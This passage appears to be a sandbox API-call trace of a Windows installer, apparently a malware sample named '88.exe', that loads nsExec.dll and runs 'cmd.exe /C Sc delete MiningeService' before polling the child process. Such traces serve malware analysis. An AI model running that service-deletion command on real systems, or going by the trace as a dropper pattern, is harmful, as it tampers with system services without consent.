lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0270.987] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0270.987] lstrcpynA (in: lpString1=0x40ac10, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0270.987] lstrcpynA (in: lpString1=0x40b010, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0270.987] lstrcmpiA (lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", lpString2="") returned 1 [0270.987] MulDiv (nNumber=32, nNumerator=30000, nDenominator=60) returned 16000 [0270.987] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x3e80, lParam=0x0) returned 0x3c8c [0270.988] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0270.988] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0270.988] lstrcpynA (in: lpString1=0x40b010, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0270.988] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0270.988] GetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll")) returned 0x2020 [0270.989] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\nsaea97.tmp\\nsexec.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0270.989] lstrcpynA (in: lpString1=0x42a048, lpString2="Skipped: ", iMaxLength=1024 | out: lpString1="Skipped: ") returned="Skipped: " [0270.989] lstrlenA (lpString="Skipped: ") returned 9 [0270.989] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 59 [0270.989] lstrcatA (in: lpString1="Skipped: ", lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" | out: lpString1="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="Skipped: C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0270.989] MulDiv (nNumber=33, nNumerator=30000, nDenominator=60) returned 16500 [0270.989] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x4074, lParam=0x0) returned 0x3e80 [0270.989] MulDiv (nNumber=34, nNumerator=30000, nDenominator=60) returned 17000 [0270.989] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x4268, lParam=0x0) returned 0x4074 [0270.990] GetVersion () returned 0x1db10106 [0270.990] GetSystemDirectoryA (in: lpBuffer=0x42e3a0, uSize=0x400 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0270.990] lstrlenA (lpString="C:\\Windows\\system32") returned 19 [0270.990] lstrcpynA (in: lpString1=0x2adbf4, lpString2="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService", iMaxLength=1024 | out: lpString1="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService" [0270.990] MulDiv (nNumber=35, nNumerator=30000, nDenominator=60) returned 17500 [0270.990] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x445c, lParam=0x0) returned 0x4268 [0270.991] lstrcpynA (in: lpString1=0x2ae004, lpString2="/OEM", iMaxLength=1024 | out: lpString1="/OEM") returned="/OEM" [0270.991] MulDiv (nNumber=36, nNumerator=30000, nDenominator=60) returned 18000 [0270.991] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x4650, lParam=0x0) returned 0x445c [0270.991] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0270.991] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0270.991] lstrcpynA (in: lpString1=0x40a810, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0270.992] lstrcpynA (in: lpString1=0x40a410, lpString2="ExecToLog", iMaxLength=1024 | out: lpString1="ExecToLog") returned="ExecToLog" [0270.992] GetModuleHandleA (lpModuleName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned 0x0 [0270.996] LoadLibraryExA (lpLibFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", hFile=0x0, dwFlags=0x8) returned 0x2d70000 [0270.998] GetProcAddress (hModule=0x2d70000, lpProcName="ExecToLog") returned 0x2d7102d [0270.998] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0270.998] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0270.998] GetCurrentProcess () returned 0xffffffff [0270.998] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2d6fb40 | out: Wow64Process=0x2d6fb40*=1) returned 1 [0270.998] FindWindowExA (hWndParent=0x401e4, hWndChildAfter=0x0, lpszClass="#32770", lpszWindow=0x0) returned 0x40300 [0270.999] FindWindowExA (hWndParent=0x40300, hWndChildAfter=0x0, lpszClass="SysListView32", lpszWindow=0x0) returned 0x302f8 [0270.999] lstrcpyA (in: lpString1=0x2ae410, lpString2="/OEM" | out: lpString1="/OEM") returned="/OEM" [0270.999] lstrlenA (lpString="/TIMEOUT=") returned 9 [0270.999] lstrlenA (lpString="/OEM") returned 4 [0270.999] lstrcmpiA (lpString1="/OEM", lpString2="/OEM") returned 0 [0270.999] lstrcpyA (in: lpString1=0x2ae410, lpString2="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService" | out: lpString1="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService") returned="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService" [0271.000] lstrlenA (lpString="/TIMEOUT=") returned 9 [0271.000] lstrlenA (lpString="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService") returned 55 [0271.000] lstrcmpiA (lpString1="C:\\Window", lpString2="/TIMEOUT=") returned 1 [0271.000] lstrlenA (lpString=":\\Windows\\system32\\cmd.exe /C Sc delete MiningeService") returned 54 [0271.000] lstrcmpiA (lpString1=":\\Windows", lpString2="/TIMEOUT=") returned 1 [0271.001] lstrlenA (lpString="\\Windows\\system32\\cmd.exe /C Sc delete MiningeService") returned 53 [0271.001] lstrcmpiA (lpString1="\\Windows\\", lpString2="/TIMEOUT=") returned 1 [0271.001] lstrlenA (lpString="Windows\\system32\\cmd.exe /C Sc delete MiningeService") returned 52 [0271.001] lstrcmpiA (lpString1="Windows\\s", lpString2="/TIMEOUT=") returned 1 [0271.001] lstrlenA (lpString="indows\\system32\\cmd.exe /C Sc delete MiningeService") returned 51 [0271.001] lstrcmpiA (lpString1="indows\\sy", lpString2="/TIMEOUT=") returned 1 [0271.001] lstrlenA (lpString="ndows\\system32\\cmd.exe /C Sc delete MiningeService") returned 50 [0271.001] lstrcmpiA (lpString1="ndows\\sys", lpString2="/TIMEOUT=") returned 1 [0271.002] lstrlenA (lpString="dows\\system32\\cmd.exe /C Sc delete MiningeService") returned 49 [0271.002] lstrcmpiA (lpString1="dows\\syst", lpString2="/TIMEOUT=") returned 1 [0271.002] lstrlenA (lpString="ows\\system32\\cmd.exe /C Sc delete MiningeService") returned 48 [0271.002] lstrcmpiA (lpString1="ows\\syste", lpString2="/TIMEOUT=") returned 1 [0271.002] lstrlenA (lpString="ws\\system32\\cmd.exe /C Sc delete MiningeService") returned 47 [0271.002] lstrcmpiA (lpString1="ws\\system", lpString2="/TIMEOUT=") returned 1 [0271.002] lstrlenA (lpString="s\\system32\\cmd.exe /C Sc delete MiningeService") returned 46 [0271.002] lstrcmpiA (lpString1="s\\system3", lpString2="/TIMEOUT=") returned 1 [0271.003] lstrlenA (lpString="\\system32\\cmd.exe /C Sc delete MiningeService") returned 45 [0271.003] lstrcmpiA (lpString1="\\system32", lpString2="/TIMEOUT=") returned 1 [0271.003] lstrlenA (lpString="system32\\cmd.exe /C Sc delete MiningeService") returned 44 [0271.003] lstrcmpiA (lpString1="system32\\", lpString2="/TIMEOUT=") returned 1 [0271.003] lstrlenA (lpString="ystem32\\cmd.exe /C Sc delete MiningeService") returned 43 [0271.003] lstrcmpiA (lpString1="ystem32\\c", lpString2="/TIMEOUT=") returned 1 [0271.003] lstrlenA (lpString="stem32\\cmd.exe /C Sc delete MiningeService") returned 42 [0271.003] lstrcmpiA (lpString1="stem32\\cm", lpString2="/TIMEOUT=") returned 1 [0271.004] lstrlenA (lpString="tem32\\cmd.exe /C Sc delete MiningeService") returned 41 [0271.004] lstrcmpiA (lpString1="tem32\\cmd", lpString2="/TIMEOUT=") returned 1 [0271.004] lstrlenA (lpString="em32\\cmd.exe /C Sc delete MiningeService") returned 40 [0271.004] lstrcmpiA (lpString1="em32\\cmd.", lpString2="/TIMEOUT=") returned 1 [0271.004] lstrlenA (lpString="m32\\cmd.exe /C Sc delete MiningeService") returned 39 [0271.004] lstrcmpiA (lpString1="m32\\cmd.e", lpString2="/TIMEOUT=") returned 1 [0271.004] lstrlenA (lpString="32\\cmd.exe /C Sc delete MiningeService") returned 38 [0271.004] lstrcmpiA (lpString1="32\\cmd.ex", lpString2="/TIMEOUT=") returned 1 [0271.005] lstrlenA (lpString="2\\cmd.exe /C Sc delete MiningeService") returned 37 [0271.005] lstrcmpiA (lpString1="2\\cmd.exe", lpString2="/TIMEOUT=") returned 1 [0271.005] lstrlenA (lpString="\\cmd.exe /C Sc delete MiningeService") returned 36 [0271.005] lstrcmpiA (lpString1="\\cmd.exe ", lpString2="/TIMEOUT=") returned 1 [0271.005] lstrlenA (lpString="cmd.exe /C Sc delete MiningeService") returned 35 [0271.005] lstrcmpiA (lpString1="cmd.exe /", lpString2="/TIMEOUT=") returned 1 [0271.005] lstrlenA (lpString="md.exe /C Sc delete MiningeService") returned 34 [0271.005] lstrcmpiA (lpString1="md.exe /C", lpString2="/TIMEOUT=") returned 1 [0271.006] lstrlenA (lpString="d.exe /C Sc delete MiningeService") returned 33 [0271.006] lstrcmpiA (lpString1="d.exe /C ", lpString2="/TIMEOUT=") returned 1 [0271.006] lstrlenA (lpString=".exe /C Sc delete MiningeService") returned 32 [0271.006] lstrcmpiA (lpString1=".exe /C S", lpString2="/TIMEOUT=") returned -1 [0271.006] lstrlenA (lpString="exe /C Sc delete MiningeService") returned 31 [0271.006] lstrcmpiA (lpString1="exe /C Sc", lpString2="/TIMEOUT=") returned 1 [0271.006] lstrlenA (lpString="xe /C Sc delete MiningeService") returned 30 [0271.006] lstrcmpiA (lpString1="xe /C Sc ", lpString2="/TIMEOUT=") returned 1 [0271.007] lstrlenA (lpString="e /C Sc delete MiningeService") returned 29 [0271.007] lstrcmpiA (lpString1="e /C Sc d", lpString2="/TIMEOUT=") returned 1 [0271.007] lstrlenA (lpString=" /C Sc delete MiningeService") returned 28 [0271.007] lstrcmpiA (lpString1=" /C Sc de", lpString2="/TIMEOUT=") returned -1 [0271.007] lstrlenA (lpString="/C Sc delete MiningeService") returned 27 [0271.007] lstrcmpiA (lpString1="/C Sc del", lpString2="/TIMEOUT=") returned -1 [0271.007] lstrlenA (lpString="C Sc delete MiningeService") returned 26 [0271.007] lstrcmpiA (lpString1="C Sc dele", lpString2="/TIMEOUT=") returned 1 [0271.008] lstrlenA (lpString=" Sc delete MiningeService") returned 25 [0271.008] lstrcmpiA (lpString1=" Sc delet", lpString2="/TIMEOUT=") returned -1 [0271.008] lstrlenA (lpString="Sc delete MiningeService") returned 24 [0271.008] lstrcmpiA (lpString1="Sc delete", lpString2="/TIMEOUT=") returned 1 [0271.008] lstrlenA (lpString="c delete MiningeService") returned 23 [0271.008] lstrcmpiA (lpString1="c delete ", lpString2="/TIMEOUT=") returned 1 [0271.008] lstrlenA (lpString=" delete MiningeService") returned 22 [0271.008] lstrcmpiA (lpString1=" delete M", lpString2="/TIMEOUT=") returned -1 [0271.009] lstrlenA (lpString="delete MiningeService") returned 21 [0271.009] lstrcmpiA (lpString1="delete Mi", lpString2="/TIMEOUT=") returned 1 [0271.009] lstrlenA (lpString="elete MiningeService") returned 20 [0271.009] lstrcmpiA (lpString1="elete Min", lpString2="/TIMEOUT=") returned 1 [0271.009] lstrlenA (lpString="lete MiningeService") returned 19 [0271.009] lstrcmpiA (lpString1="lete Mini", lpString2="/TIMEOUT=") returned 1 [0271.009] lstrlenA (lpString="ete MiningeService") returned 18 [0271.009] lstrcmpiA (lpString1="ete Minin", lpString2="/TIMEOUT=") returned 1 [0271.010] lstrlenA (lpString="te MiningeService") returned 17 [0271.010] lstrcmpiA (lpString1="te Mining", lpString2="/TIMEOUT=") returned 1 [0271.010] lstrlenA (lpString="e MiningeService") returned 16 [0271.010] lstrcmpiA (lpString1="e Mininge", lpString2="/TIMEOUT=") returned 1 [0271.010] lstrlenA (lpString=" MiningeService") returned 15 [0271.010] lstrcmpiA (lpString1=" MiningeS", lpString2="/TIMEOUT=") returned -1 [0271.010] lstrlenA (lpString="MiningeService") returned 14 [0271.010] lstrcmpiA (lpString1="MiningeSe", lpString2="/TIMEOUT=") returned 1 [0271.011] lstrlenA (lpString="iningeService") returned 13 [0271.011] lstrcmpiA (lpString1="iningeSer", lpString2="/TIMEOUT=") returned 1 [0271.011] lstrlenA (lpString="ningeService") returned 12 [0271.011] lstrcmpiA (lpString1="ningeServ", lpString2="/TIMEOUT=") returned 1 [0271.011] lstrlenA (lpString="ingeService") returned 11 [0271.011] lstrcmpiA (lpString1="ingeServi", lpString2="/TIMEOUT=") returned 1 [0271.012] lstrlenA (lpString="ngeService") returned 10 [0271.012] lstrcmpiA (lpString1="ngeServic", lpString2="/TIMEOUT=") returned 1 [0271.012] lstrlenA (lpString="geService") returned 9 [0271.012] lstrcmpiA (lpString1="geService", lpString2="/TIMEOUT=") returned 1 [0271.012] lstrlenA (lpString="eService") returned 8 [0271.012] lstrcmpiA (lpString1="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService", lpString2="/OEM") returned 1 [0271.012] GetVersion () returned 0x1db10106 [0271.012] GlobalLock (hMem=0x224003c) returned 0x2ae820 [0271.012] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x2d6fd20, dwRevision=0x1 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0271.012] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2d6fd20, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x2d6fd20) returned 1 [0271.012] CreatePipe (in: hReadPipe=0x2d6fd74, hWritePipe=0x2d6fd68, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd74*=0x210, hWritePipe=0x2d6fd68*=0x214) returned 1 [0271.013] CreatePipe (in: hReadPipe=0x2d6fd58, hWritePipe=0x2d6fd6c, lpPipeAttributes=0x2d6fd44, nSize=0x0 | out: hReadPipe=0x2d6fd58*=0x1c, hWritePipe=0x2d6fd6c*=0x20c) returned 1 [0271.013] GetStartupInfoA (in: lpStartupInfo=0x2d6fcdc | out: lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0271.013] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x10, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2d6fcdc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20c, hStdOutput=0x214, hStdError=0x214), lpProcessInformation=0x2d6fd34 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /C Sc delete MiningeService", lpProcessInformation=0x2d6fd34*(hProcess=0x218, hThread=0x21c, dwProcessId=0x8f0, dwThreadId=0x8f4)) returned 1 [0271.021] GetTickCount () returned 0x1d60d00 [0271.021] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.021] Sleep (dwMilliseconds=0x64) [0271.119] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.120] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.120] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.120] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.120] Sleep (dwMilliseconds=0x64) [0271.229] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.229] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.229] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.229] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.229] Sleep (dwMilliseconds=0x64) [0271.339] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.339] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.339] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.339] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.339] Sleep (dwMilliseconds=0x64) [0271.447] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.447] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.447] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.447] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.447] Sleep (dwMilliseconds=0x64) [0271.556] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.556] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.556] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.556] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.557] Sleep (dwMilliseconds=0x64) [0271.666] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.666] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.666] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.667] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.667] Sleep (dwMilliseconds=0x64) [0271.774] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.774] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.774] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.775] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.775] Sleep (dwMilliseconds=0x64) [0271.884] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0271.884] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0271.884] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.884] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0271.884] Sleep (dwMilliseconds=0x64) [0272.117] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0272.118] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0272.118] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.118] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.118] Sleep (dwMilliseconds=0x64) [0272.237] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0272.237] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0272.237] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.237] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x2d6fd7c*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0272.238] Sleep (dwMilliseconds=0x64) [0272.352] WaitForSingleObject (hHandle=0x218, dwMilliseconds=0x0) returned 0x102 [0272.352] GetExitCodeProcess (in: hProcess=0x218, lpExitCode=0x2d6fd60 | out: lpExitCode=0x2d6fd60*=0x103) returned 1 [0272.352] PeekNamedPipe (in: hNamedPipe=0x210, lpBuffer=0x0, 